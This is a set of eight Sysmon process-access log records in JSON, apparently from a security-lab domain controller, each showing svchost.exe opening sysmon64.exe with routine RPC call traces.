{"EventTime":"2020-08-01 06:49:15","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":1321,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:49:15.568\r\nSourceProcessGUID: {E2A3D6B1-105A-5F25-0000-0010CE650000}\r\nSourceProcessId: 596\r\nSourceThreadId: 648\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {E2A3D6B1-106B-5F25-0000-001051C70200}\r\nTargetProcessId: 2928\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+12343|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:49:15.568","SourceProcessGUID":"{E2A3D6B1-105A-5F25-0000-0010CE650000}","SourceProcessId":"596","SourceThreadId":"648","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{E2A3D6B1-106B-5F25-0000-001051C70200}","TargetProcessId":"2928","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+12343|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 06:49:16","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:49:15","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":1322,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:49:15.568\r\nSourceProcessGUID: {E2A3D6B1-105A-5F25-0000-0010CE650000}\r\nSourceProcessId: 596\r\nSourceThreadId: 648\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {E2A3D6B1-106B-5F25-0000-001051C70200}\r\nTargetProcessId: 2928\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11378|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:49:15.568","SourceProcessGUID":"{E2A3D6B1-105A-5F25-0000-0010CE650000}","SourceProcessId":"596","SourceThreadId":"648","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{E2A3D6B1-106B-5F25-0000-001051C70200}","TargetProcessId":"2928","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11378|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 06:49:16","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:49:15","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":1323,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:49:15.568\r\nSourceProcessGUID: {E2A3D6B1-105A-5F25-0000-0010CE650000}\r\nSourceProcessId: 596\r\nSourceThreadId: 648\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {E2A3D6B1-106B-5F25-0000-001051C70200}\r\nTargetProcessId: 2928\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11dcd|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:49:15.568","SourceProcessGUID":"{E2A3D6B1-105A-5F25-0000-0010CE650000}","SourceProcessId":"596","SourceThreadId":"648","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{E2A3D6B1-106B-5F25-0000-001051C70200}","TargetProcessId":"2928","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11dcd|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 06:49:16","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:49:15","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":1324,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:49:15.568\r\nSourceProcessGUID: {E2A3D6B1-105A-5F25-0000-0010CE650000}\r\nSourceProcessId: 596\r\nSourceThreadId: 648\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {E2A3D6B1-106B-5F25-0000-001051C70200}\r\nTargetProcessId: 2928\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+918f|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:49:15.568","SourceProcessGUID":"{E2A3D6B1-105A-5F25-0000-0010CE650000}","SourceProcessId":"596","SourceThreadId":"648","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{E2A3D6B1-106B-5F25-0000-001051C70200}","TargetProcessId":"2928","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+918f|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 06:49:16","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:49:15","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":1325,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:49:15.568\r\nSourceProcessGUID: {E2A3D6B1-105A-5F25-0000-0010CE650000}\r\nSourceProcessId: 596\r\nSourceThreadId: 648\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {E2A3D6B1-106B-5F25-0000-001051C70200}\r\nTargetProcessId: 2928\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+92e1|c:\\windows\\system32\\lsm.dll+91d0|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:49:15.568","SourceProcessGUID":"{E2A3D6B1-105A-5F25-0000-0010CE650000}","SourceProcessId":"596","SourceThreadId":"648","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{E2A3D6B1-106B-5F25-0000-001051C70200}","TargetProcessId":"2928","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+92e1|c:\\windows\\system32\\lsm.dll+91d0|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 06:49:16","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:49:15","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":1326,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:49:15.568\r\nSourceProcessGUID: {E2A3D6B1-105A-5F25-0000-0010CE650000}\r\nSourceProcessId: 596\r\nSourceThreadId: 648\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {E2A3D6B1-106B-5F25-0000-001051C70200}\r\nTargetProcessId: 2928\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+12343|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:49:15.568","SourceProcessGUID":"{E2A3D6B1-105A-5F25-0000-0010CE650000}","SourceProcessId":"596","SourceThreadId":"648","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{E2A3D6B1-106B-5F25-0000-001051C70200}","TargetProcessId":"2928","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+12343|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 06:49:16","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:49:15","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":1327,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:49:15.568\r\nSourceProcessGUID: {E2A3D6B1-105A-5F25-0000-0010CE650000}\r\nSourceProcessId: 596\r\nSourceThreadId: 648\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {E2A3D6B1-106B-5F25-0000-001051C70200}\r\nTargetProcessId: 2928\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11378|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:49:15.568","SourceProcessGUID":"{E2A3D6B1-105A-5F25-0000-0010CE650000}","SourceProcessId":"596","SourceThreadId":"648","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{E2A3D6B1-106B-5F25-0000-001051C70200}","TargetProcessId":"2928","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11378|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 06:49:16","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:49:15","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":1328,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:49:15.568\r\nSourceProcessGUID: {E2A3D6B1-105A-5F25-0000-0010CE650000}\r\nSourceProcessId: 596\r\nSourceThreadId: 648\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {E2A3D6B1-106B-5F25-0000-001051C70200}\r\nTargetProcessId: 2928\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11dcd|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:49:15.568","SourceProcessGUID":"{E2A3D6B1-105A-5F25-0000-0010CE650000}","SourceProcessId":"596","SourceThreadId":"648","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{E2A3D6B1-106B-5F25-0000-001051C70200}","TargetProcessId":"2928","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11dcd|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 06:49:16","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
